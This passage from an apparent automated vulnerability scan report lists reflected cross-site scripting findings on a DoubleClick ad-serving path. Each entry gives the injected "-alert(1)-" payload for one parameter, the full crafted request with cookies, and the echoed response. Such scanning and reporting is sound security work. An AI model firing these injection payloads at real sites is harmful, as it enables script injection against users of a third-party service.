GET /adi/N5823.CBSi/B5448927.5;sz=728x90;click0=http://adlog.com.com/adlog/e/r=10736&sg=511121&o=1%253a&h=cn&p=2&b=5&l=en_US&site=3&pt=2000&nd=1&pid=&cid=0&pp=100&e=3&rqid=00phx1-ad-e15:4DB87DC42925EE&orh=cnet.com&oepartner=&epartner=&ppartner=&pdom=www.cnet.com&cpnmodule=5fc88"-alert(1)-"f8894e94b96&count=&ra=173.193.214.243&pg=mvthWAoOYJUAABv9IaUAAAJ@&t=2011.04.27.23.14.41&event=58/;ord=2011.04.27.23.14.41? HTTP/1.1
Host: ad.doubleclick.net
Proxy-Connection: keep-alive
Referer: http://news.cnet.com/?tag=hdr;brandnav
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.205 Safari/534.16
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: __gads=ID=3cde97f19b2af13f:T=1303423671:S=ALNI_MZrSVhBI9QqwoFvqOiF9aToOUXXzA; id=22fba3001601008d|1676624/553458/15090,2716759/964419/15088|t=1303072660|et=730|cs=-8oc1u1u; L20=1.1303929977257

Response

HTTP/1.1 200 OK
Server: DCLK-AdSvr
Content-Type: text/html
Date: Wed, 27 Apr 2011 23:20:49 GMT
Cache-Control: private, x-gzip-ok=""
Content-Length: 4607

<!-- Template Id = 13,900 Template Name = Banner Creative (Flash) - In Page - [DFA] -->
<!-- Copyright 2006 DoubleClick Inc., All rights reserved. -->
<SCRIPT LANGUAGE="JavaScript">
<!--
function DCF
...[SNIP]...
og/e/r=10736&sg=511121&o=1%253a&h=cn&p=2&b=5&l=en_US&site=3&pt=2000&nd=1&pid=&cid=0&pp=100&e=3&rqid=00phx1-ad-e15:4DB87DC42925EE&orh=cnet.com&oepartner=&epartner=&ppartner=&pdom=www.cnet.com&cpnmodule=5fc88"-alert(1)-"f8894e94b96&count=&ra=173.193.214.243&pg=mvthWAoOYJUAABv9IaUAAAJ@&t=2011.04.27.23.14.41&event=58/http://www.hp.com/united-states/campaigns/elite-products/index.html?jumpid=ex_R2612_go/elite-products/dm:_N5823.CBS
...[SNIP]...

3.196. http://ad.doubleclick.net/adi/N5823.CBSi/B5448927.5 [e parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   http://ad.doubleclick.net
Path:   /adi/N5823.CBSi/B5448927.5

Issue detail

The value of the e request parameter is copied into a JavaScript string which is encapsulated in double quotation marks. The payload fcd34"-alert(1)-"06cd0426f9b was submitted in the e parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /adi/N5823.CBSi/B5448927.5;sz=728x90;click0=http://adlog.com.com/adlog/e/r=10736&sg=511121&o=1%253a&h=cn&p=2&b=5&l=en_US&site=3&pt=2000&nd=1&pid=&cid=0&pp=100&e=3fcd34"-alert(1)-"06cd0426f9b&rqid=00phx1-ad-e15:4DB87DC42925EE&orh=cnet.com&oepartner=&epartner=&ppartner=&pdom=www.cnet.com&cpnmodule=&count=&ra=173.193.214.243&pg=mvthWAoOYJUAABv9IaUAAAJ@&t=2011.04.27.23.14.41&event=58/;ord=2011.04.27.23.14.41? HTTP/1.1
Host: ad.doubleclick.net
Proxy-Connection: keep-alive
Referer: http://news.cnet.com/?tag=hdr;brandnav
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.205 Safari/534.16
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: __gads=ID=3cde97f19b2af13f:T=1303423671:S=ALNI_MZrSVhBI9QqwoFvqOiF9aToOUXXzA; id=22fba3001601008d|1676624/553458/15090,2716759/964419/15088|t=1303072660|et=730|cs=-8oc1u1u; L20=1.1303929977257

Response

HTTP/1.1 200 OK
Server: DCLK-AdSvr
Content-Type: text/html
Date: Wed, 27 Apr 2011 23:19:07 GMT
Cache-Control: private, x-gzip-ok=""
Content-Length: 4606

<!-- Template Id = 13,900 Template Name = Banner Creative (Flash) - In Page - [DFA] -->
<!-- Copyright 2006 DoubleClick Inc., All rights reserved. -->
<SCRIPT LANGUAGE="JavaScript">
<!--
function DCF
...[SNIP]...
0360897%3B0-0%3B0%3B63094144%3B3454-728/90%3B41852066/41869853/1%3B%3B%7Esscs%3D%3fhttp://adlog.com.com/adlog/e/r=10736&sg=511121&o=1%253a&h=cn&p=2&b=5&l=en_US&site=3&pt=2000&nd=1&pid=&cid=0&pp=100&e=3fcd34"-alert(1)-"06cd0426f9b&rqid=00phx1-ad-e15:4DB87DC42925EE&orh=cnet.com&oepartner=&epartner=&ppartner=&pdom=www.cnet.com&cpnmodule=&count=&ra=173.193.214.243&pg=mvthWAoOYJUAABv9IaUAAAJ@&t=2011.04.27.23.14.41&event=58/http://w
...[SNIP]...

3.197. http://ad.doubleclick.net/adi/N5823.CBSi/B5448927.5 [epartner parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   http://ad.doubleclick.net
Path:   /adi/N5823.CBSi/B5448927.5

Issue detail

The value of the epartner request parameter is copied into a JavaScript string which is encapsulated in double quotation marks. The payload b7f5a"-alert(1)-"c05029232b4 was submitted in the epartner parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /adi/N5823.CBSi/B5448927.5;sz=728x90;click0=http://adlog.com.com/adlog/e/r=10736&sg=511121&o=1%253a&h=cn&p=2&b=5&l=en_US&site=3&pt=2000&nd=1&pid=&cid=0&pp=100&e=3&rqid=00phx1-ad-e15:4DB87DC42925EE&orh=cnet.com&oepartner=&epartner=b7f5a"-alert(1)-"c05029232b4&ppartner=&pdom=www.cnet.com&cpnmodule=&count=&ra=173.193.214.243&pg=mvthWAoOYJUAABv9IaUAAAJ@&t=2011.04.27.23.14.41&event=58/;ord=2011.04.27.23.14.41? HTTP/1.1
Host: ad.doubleclick.net
Proxy-Connection: keep-alive
Referer: http://news.cnet.com/?tag=hdr;brandnav
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.205 Safari/534.16
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: __gads=ID=3cde97f19b2af13f:T=1303423671:S=ALNI_MZrSVhBI9QqwoFvqOiF9aToOUXXzA; id=22fba3001601008d|1676624/553458/15090,2716759/964419/15088|t=1303072660|et=730|cs=-8oc1u1u; L20=1.1303929977257

Response

HTTP/1.1 200 OK
Server: DCLK-AdSvr
Content-Type: text/html
Date: Wed, 27 Apr 2011 23:20:07 GMT
Cache-Control: private, x-gzip-ok=""
Content-Length: 4607

<!-- Template Id = 13,900 Template Name = Banner Creative (Flash) - In Page - [DFA] -->
<!-- Copyright 2006 DoubleClick Inc., All rights reserved. -->
<SCRIPT LANGUAGE="JavaScript">
<!--
function DCF
...[SNIP]...
3B%7Esscs%3D%3fhttp://adlog.com.com/adlog/e/r=10736&sg=511121&o=1%253a&h=cn&p=2&b=5&l=en_US&site=3&pt=2000&nd=1&pid=&cid=0&pp=100&e=3&rqid=00phx1-ad-e15:4DB87DC42925EE&orh=cnet.com&oepartner=&epartner=b7f5a"-alert(1)-"c05029232b4&ppartner=&pdom=www.cnet.com&cpnmodule=&count=&ra=173.193.214.243&pg=mvthWAoOYJUAABv9IaUAAAJ@&t=2011.04.27.23.14.41&event=58/http://www.hp.com/united-states/campaigns/elite-products/index.html?jumpid=e
...[SNIP]...

3.198. http://ad.doubleclick.net/adi/N5823.CBSi/B5448927.5 [event parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   http://ad.doubleclick.net
Path:   /adi/N5823.CBSi/B5448927.5

Issue detail

The value of the event request parameter is copied into a JavaScript string which is encapsulated in double quotation marks. The payload dea67"-alert(1)-"667d66c1504 was submitted in the event parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /adi/N5823.CBSi/B5448927.5;sz=728x90;click0=http://adlog.com.com/adlog/e/r=10736&sg=511121&o=1%253a&h=cn&p=2&b=5&l=en_US&site=3&pt=2000&nd=1&pid=&cid=0&pp=100&e=3&rqid=00phx1-ad-e15:4DB87DC42925EE&orh=cnet.com&oepartner=&epartner=&ppartner=&pdom=www.cnet.com&cpnmodule=&count=&ra=173.193.214.243&pg=mvthWAoOYJUAABv9IaUAAAJ@&t=2011.04.27.23.14.41&event=dea67"-alert(1)-"667d66c1504 HTTP/1.1
Host: ad.doubleclick.net
Proxy-Connection: keep-alive
Referer: http://news.cnet.com/?tag=hdr;brandnav
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.205 Safari/534.16
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: __gads=ID=3cde97f19b2af13f:T=1303423671:S=ALNI_MZrSVhBI9QqwoFvqOiF9aToOUXXzA; id=22fba3001601008d|1676624/553458/15090,2716759/964419/15088|t=1303072660|et=730|cs=-8oc1u1u; L20=1.1303929977257

Response

HTTP/1.1 200 OK
Server: DCLK-AdSvr
Content-Type: text/html
Content-Length: 4601
Cache-Control: no-cache
Pragma: no-cache
Date: Wed, 27 Apr 2011 23:22:01 GMT
Expires: Wed, 27 Apr 2011 23:22:01 GMT

<!-- Template Id = 13,900 Template Name = Banner Creative (Flash) - In Page - [DFA] -->
<!-- Copyright 2006 DoubleClick Inc., All rights reserved. -->
<SCRIPT LANGUAGE="JavaScript">
<!--
function DCF
...[SNIP]...
&pp=100&e=3&rqid=00phx1-ad-e15:4DB87DC42925EE&orh=cnet.com&oepartner=&epartner=&ppartner=&pdom=www.cnet.com&cpnmodule=&count=&ra=173.193.214.243&pg=mvthWAoOYJUAABv9IaUAAAJ@&t=2011.04.27.23.14.41&event=dea67"-alert(1)-"667d66c1504http://www.hp.com/united-states/campaigns/elite-products/index.html?jumpid=ex_R2612_go/elite-products/dm:_N5823.CBSi_63094144_240360897_41852066");
var wmode = "opaque";
var bg = "same as SWF";
var dca
...[SNIP]...

3.199. http://ad.doubleclick.net/adi/N5823.CBSi/B5448927.5 [h parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   http://ad.doubleclick.net
Path:   /adi/N5823.CBSi/B5448927.5

Issue detail

The value of the h request parameter is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 4dbe8"-alert(1)-"7ccee170db7 was submitted in the h parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /adi/N5823.CBSi/B5448927.5;sz=728x90;click0=http://adlog.com.com/adlog/e/r=10736&sg=511121&o=1%253a&h=cn4dbe8"-alert(1)-"7ccee170db7&p=2&b=5&l=en_US&site=3&pt=2000&nd=1&pid=&cid=0&pp=100&e=3&rqid=00phx1-ad-e15:4DB87DC42925EE&orh=cnet.com&oepartner=&epartner=&ppartner=&pdom=www.cnet.com&cpnmodule=&count=&ra=173.193.214.243&pg=mvthWAoOYJUAABv9IaUAAAJ@&t=2011.04.27.23.14.41&event=58/;ord=2011.04.27.23.14.41? HTTP/1.1
Host: ad.doubleclick.net
Proxy-Connection: keep-alive
Referer: http://news.cnet.com/?tag=hdr;brandnav
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.205 Safari/534.16
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: __gads=ID=3cde97f19b2af13f:T=1303423671:S=ALNI_MZrSVhBI9QqwoFvqOiF9aToOUXXzA; id=22fba3001601008d|1676624/553458/15090,2716759/964419/15088|t=1303072660|et=730|cs=-8oc1u1u; L20=1.1303929977257

Response

HTTP/1.1 200 OK
Server: DCLK-AdSvr
Content-Type: text/html
Date: Wed, 27 Apr 2011 23:16:44 GMT
Cache-Control: private, x-gzip-ok=""
Content-Length: 4608

<!-- Template Id = 13,900 Template Name = Banner Creative (Flash) - In Page - [DFA] -->
<!-- Copyright 2006 DoubleClick Inc., All rights reserved. -->
<SCRIPT LANGUAGE="JavaScript">
<!--
function DCF
...[SNIP]...
//ad.doubleclick.net/click%3Bh%3Dv8/3af6/17/153/%2a/m%3B240360897%3B0-0%3B0%3B63094144%3B3454-728/90%3B41852066/41869853/1%3B%3B%7Esscs%3D%3fhttp://adlog.com.com/adlog/e/r=10736&sg=511121&o=1%253a&h=cn4dbe8"-alert(1)-"7ccee170db7&p=2&b=5&l=en_US&site=3&pt=2000&nd=1&pid=&cid=0&pp=100&e=3&rqid=00phx1-ad-e15:4DB87DC42925EE&orh=cnet.com&oepartner=&epartner=&ppartner=&pdom=www.cnet.com&cpnmodule=&count=&ra=173.193.214.243&pg=mvthWA
...[SNIP]...

3.200. http://ad.doubleclick.net/adi/N5823.CBSi/B5448927.5 [l parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   http://ad.doubleclick.net
Path:   /adi/N5823.CBSi/B5448927.5

Issue detail

The value of the l request parameter is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 97c91"-alert(1)-"12af05d6124 was submitted in the l parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /adi/N5823.CBSi/B5448927.5;sz=728x90;click0=http://adlog.com.com/adlog/e/r=10736&sg=511121&o=1%253a&h=cn&p=2&b=5&l=en_US97c91"-alert(1)-"12af05d6124&site=3&pt=2000&nd=1&pid=&cid=0&pp=100&e=3&rqid=00phx1-ad-e15:4DB87DC42925EE&orh=cnet.com&oepartner=&epartner=&ppartner=&pdom=www.cnet.com&cpnmodule=&count=&ra=173.193.214.243&pg=mvthWAoOYJUAABv9IaUAAAJ@&t=2011.04.27.23.14.41&event=58/;ord=2011.04.27.23.14.41? HTTP/1.1
Host: ad.doubleclick.net
Proxy-Connection: keep-alive
Referer: http://news.cnet.com/?tag=hdr;brandnav
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.205 Safari/534.16
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: __gads=ID=3cde97f19b2af13f:T=1303423671:S=ALNI_MZrSVhBI9QqwoFvqOiF9aToOUXXzA; id=22fba3001601008d|1676624/553458/15090,2716759/964419/15088|t=1303072660|et=730|cs=-8oc1u1u; L20=1.1303929977257

Response

HTTP/1.1 200 OK
Server: DCLK-AdSvr
Content-Type: text/html
Date: Wed, 27 Apr 2011 23:17:25 GMT
Cache-Control: private, x-gzip-ok=""
Content-Length: 4608

<!-- Template Id = 13,900 Template Name = Banner Creative (Flash) - In Page - [DFA] -->
<!-- Copyright 2006 DoubleClick Inc., All rights reserved. -->
<SCRIPT LANGUAGE="JavaScript">
<!--
function DCF
...[SNIP]...
.net/click%3Bh%3Dv8/3af6/17/153/%2a/m%3B240360897%3B0-0%3B0%3B63094144%3B3454-728/90%3B41852066/41869853/1%3B%3B%7Esscs%3D%3fhttp://adlog.com.com/adlog/e/r=10736&sg=511121&o=1%253a&h=cn&p=2&b=5&l=en_US97c91"-alert(1)-"12af05d6124&site=3&pt=2000&nd=1&pid=&cid=0&pp=100&e=3&rqid=00phx1-ad-e15:4DB87DC42925EE&orh=cnet.com&oepartner=&epartner=&ppartner=&pdom=www.cnet.com&cpnmodule=&count=&ra=173.193.214.243&pg=mvthWAoOYJUAABv9IaUAAA
...[SNIP]...

3.201. http://ad.doubleclick.net/adi/N5823.CBSi/B5448927.5 [nd parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   http://ad.doubleclick.net
Path:   /adi/N5823.CBSi/B5448927.5

Issue detail

The value of the nd request parameter is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 76e70"-alert(1)-"5f8ba91465f was submitted in the nd parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /adi/N5823.CBSi/B5448927.5;sz=728x90;click0=http://adlog.com.com/adlog/e/r=10736&sg=511121&o=1%253a&h=cn&p=2&b=5&l=en_US&site=3&pt=2000&nd=176e70"-alert(1)-"5f8ba91465f&pid=&cid=0&pp=100&e=3&rqid=00phx1-ad-e15:4DB87DC42925EE&orh=cnet.com&oepartner=&epartner=&ppartner=&pdom=www.cnet.com&cpnmodule=&count=&ra=173.193.214.243&pg=mvthWAoOYJUAABv9IaUAAAJ@&t=2011.04.27.23.14.41&event=58/;ord=2011.04.27.23.14.41? HTTP/1.1
Host: ad.doubleclick.net
Proxy-Connection: keep-alive
Referer: http://news.cnet.com/?tag=hdr;brandnav
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.205 Safari/534.16
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: __gads=ID=3cde97f19b2af13f:T=1303423671:S=ALNI_MZrSVhBI9QqwoFvqOiF9aToOUXXzA; id=22fba3001601008d|1676624/553458/15090,2716759/964419/15088|t=1303072660|et=730|cs=-8oc1u1u; L20=1.1303929977257

Response

HTTP/1.1 200 OK
Server: DCLK-AdSvr
Content-Type: text/html
Date: Wed, 27 Apr 2011 23:18:07 GMT
Cache-Control: private, x-gzip-ok=""
Content-Length: 4608

<!-- Template Id = 13,900 Template Name = Banner Creative (Flash) - In Page - [DFA] -->
<!-- Copyright 2006 DoubleClick Inc., All rights reserved. -->
<SCRIPT LANGUAGE="JavaScript">
<!--
function DCF
...[SNIP]...
3af6/17/153/%2a/m%3B240360897%3B0-0%3B0%3B63094144%3B3454-728/90%3B41852066/41869853/1%3B%3B%7Esscs%3D%3fhttp://adlog.com.com/adlog/e/r=10736&sg=511121&o=1%253a&h=cn&p=2&b=5&l=en_US&site=3&pt=2000&nd=176e70"-alert(1)-"5f8ba91465f&pid=&cid=0&pp=100&e=3&rqid=00phx1-ad-e15:4DB87DC42925EE&orh=cnet.com&oepartner=&epartner=&ppartner=&pdom=www.cnet.com&cpnmodule=&count=&ra=173.193.214.243&pg=mvthWAoOYJUAABv9IaUAAAJ@&t=2011.04.27.23.1
...[SNIP]...

3.202. http://ad.doubleclick.net/adi/N5823.CBSi/B5448927.5 [o parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   http://ad.doubleclick.net
Path:   /adi/N5823.CBSi/B5448927.5

Issue detail

The value of the o request parameter is copied into a JavaScript string which is encapsulated in double quotation marks. The payload f5e94"-alert(1)-"672982ddc8e was submitted in the o parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /adi/N5823.CBSi/B5448927.5;sz=728x90;click0=http://adlog.com.com/adlog/e/r=10736&sg=511121&o=1%253af5e94"-alert(1)-"672982ddc8e&h=cn&p=2&b=5&l=en_US&site=3&pt=2000&nd=1&pid=&cid=0&pp=100&e=3&rqid=00phx1-ad-e15:4DB87DC42925EE&orh=cnet.com&oepartner=&epartner=&ppartner=&pdom=www.cnet.com&cpnmodule=&count=&ra=173.193.214.243&pg=mvthWAoOYJUAABv9IaUAAAJ@&t=2011.04.27.23.14.41&event=58/;ord=2011.04.27.23.14.41? HTTP/1.1
Host: ad.doubleclick.net
Proxy-Connection: keep-alive
Referer: http://news.cnet.com/?tag=hdr;brandnav
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.205 Safari/534.16
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: __gads=ID=3cde97f19b2af13f:T=1303423671:S=ALNI_MZrSVhBI9QqwoFvqOiF9aToOUXXzA; id=22fba3001601008d|1676624/553458/15090,2716759/964419/15088|t=1303072660|et=730|cs=-8oc1u1u; L20=1.1303929977257

Response

HTTP/1.1 200 OK
Server: DCLK-AdSvr
Content-Type: text/html
Date: Wed, 27 Apr 2011 23:16:28 GMT
Cache-Control: private, x-gzip-ok=""
Content-Length: 4608

<!-- Template Id = 13,900 Template Name = Banner Creative (Flash) - In Page - [DFA] -->
<!-- Copyright 2006 DoubleClick Inc., All rights reserved. -->
<SCRIPT LANGUAGE="JavaScript">
<!--
function DCF
...[SNIP]...
http://ad.doubleclick.net/click%3Bh%3Dv8/3af6/17/153/%2a/m%3B240360897%3B0-0%3B0%3B63094144%3B3454-728/90%3B41852066/41869853/1%3B%3B%7Esscs%3D%3fhttp://adlog.com.com/adlog/e/r=10736&sg=511121&o=1%253af5e94"-alert(1)-"672982ddc8e&h=cn&p=2&b=5&l=en_US&site=3&pt=2000&nd=1&pid=&cid=0&pp=100&e=3&rqid=00phx1-ad-e15:4DB87DC42925EE&orh=cnet.com&oepartner=&epartner=&ppartner=&pdom=www.cnet.com&cpnmodule=&count=&ra=173.193.214.243&pg=m
...[SNIP]...

3.203. http://ad.doubleclick.net/adi/N5823.CBSi/B5448927.5 [oepartner parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   http://ad.doubleclick.net
Path:   /adi/N5823.CBSi/B5448927.5

Issue detail

The value of the oepartner request parameter is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 9c8d5"-alert(1)-"1adcf2285e9 was submitted in the oepartner parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /adi/N5823.CBSi/B5448927.5;sz=728x90;click0=http://adlog.com.com/adlog/e/r=10736&sg=511121&o=1%253a&h=cn&p=2&b=5&l=en_US&site=3&pt=2000&nd=1&pid=&cid=0&pp=100&e=3&rqid=00phx1-ad-e15:4DB87DC42925EE&orh=cnet.com&oepartner=9c8d5"-alert(1)-"1adcf2285e9&epartner=&ppartner=&pdom=www.cnet.com&cpnmodule=&count=&ra=173.193.214.243&pg=mvthWAoOYJUAABv9IaUAAAJ@&t=2011.04.27.23.14.41&event=58/;ord=2011.04.27.23.14.41? HTTP/1.1
Host: ad.doubleclick.net
Proxy-Connection: keep-alive
Referer: http://news.cnet.com/?tag=hdr;brandnav
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.205 Safari/534.16
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: __gads=ID=3cde97f19b2af13f:T=1303423671:S=ALNI_MZrSVhBI9QqwoFvqOiF9aToOUXXzA; id=22fba3001601008d|1676624/553458/15090,2716759/964419/15088|t=1303072660|et=730|cs=-8oc1u1u; L20=1.1303929977257

Response

HTTP/1.1 200 OK
Server: DCLK-AdSvr
Content-Type: text/html
Date: Wed, 27 Apr 2011 23:19:50 GMT
Cache-Control: private, x-gzip-ok=""
Content-Length: 4606

<!-- Template Id = 13,900 Template Name = Banner Creative (Flash) - In Page - [DFA] -->
<!-- Copyright 2006 DoubleClick Inc., All rights reserved. -->
<SCRIPT LANGUAGE="JavaScript">
<!--
function DCF
...[SNIP]...
9853/1%3B%3B%7Esscs%3D%3fhttp://adlog.com.com/adlog/e/r=10736&sg=511121&o=1%253a&h=cn&p=2&b=5&l=en_US&site=3&pt=2000&nd=1&pid=&cid=0&pp=100&e=3&rqid=00phx1-ad-e15:4DB87DC42925EE&orh=cnet.com&oepartner=9c8d5"-alert(1)-"1adcf2285e9&epartner=&ppartner=&pdom=www.cnet.com&cpnmodule=&count=&ra=173.193.214.243&pg=mvthWAoOYJUAABv9IaUAAAJ@&t=2011.04.27.23.14.41&event=58/http://www.hp.com/united-states/campaigns/elite-products/index.htm
...[SNIP]...

3.204. http://ad.doubleclick.net/adi/N5823.CBSi/B5448927.5 [orh parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   http://ad.doubleclick.net
Path:   /adi/N5823.CBSi/B5448927.5

Issue detail

The value of the orh request parameter is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 2eaae"-alert(1)-"b85f9dd3226 was submitted in the orh parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /adi/N5823.CBSi/B5448927.5;sz=728x90;click0=http://adlog.com.com/adlog/e/r=10736&sg=511121&o=1%253a&h=cn&p=2&b=5&l=en_US&site=3&pt=2000&nd=1&pid=&cid=0&pp=100&e=3&rqid=00phx1-ad-e15:4DB87DC42925EE&orh=cnet.com2eaae"-alert(1)-"b85f9dd3226&oepartner=&epartner=&ppartner=&pdom=www.cnet.com&cpnmodule=&count=&ra=173.193.214.243&pg=mvthWAoOYJUAABv9IaUAAAJ@&t=2011.04.27.23.14.41&event=58/;ord=2011.04.27.23.14.41? HTTP/1.1
Host: ad.doubleclick.net
Proxy-Connection: keep-alive
Referer: http://news.cnet.com/?tag=hdr;brandnav
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.205 Safari/534.16
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: __gads=ID=3cde97f19b2af13f:T=1303423671:S=ALNI_MZrSVhBI9QqwoFvqOiF9aToOUXXzA; id=22fba3001601008d|1676624/553458/15090,2716759/964419/15088|t=1303072660|et=730|cs=-8oc1u1u; L20=1.1303929977257

Response

HTTP/1.1 200 OK
Server: DCLK-AdSvr
Content-Type: text/html
Date: Wed, 27 Apr 2011 23:19:36 GMT
Cache-Control: private, x-gzip-ok=""
Content-Length: 4606

<!-- Template Id = 13,900 Template Name = Banner Creative (Flash) - In Page - [DFA] -->
<!-- Copyright 2006 DoubleClick Inc., All rights reserved. -->
<SCRIPT LANGUAGE="JavaScript">
<!--
function DCF
...[SNIP]...
852066/41869853/1%3B%3B%7Esscs%3D%3fhttp://adlog.com.com/adlog/e/r=10736&sg=511121&o=1%253a&h=cn&p=2&b=5&l=en_US&site=3&pt=2000&nd=1&pid=&cid=0&pp=100&e=3&rqid=00phx1-ad-e15:4DB87DC42925EE&orh=cnet.com2eaae"-alert(1)-"b85f9dd3226&oepartner=&epartner=&ppartner=&pdom=www.cnet.com&cpnmodule=&count=&ra=173.193.214.243&pg=mvthWAoOYJUAABv9IaUAAAJ@&t=2011.04.27.23.14.41&event=58/http://www.hp.com/united-states/campaigns/elite-product
...[SNIP]...

3.205. http://ad.doubleclick.net/adi/N5823.CBSi/B5448927.5 [p parameter]

Summary

Severity:   High
Confidence:   Certain
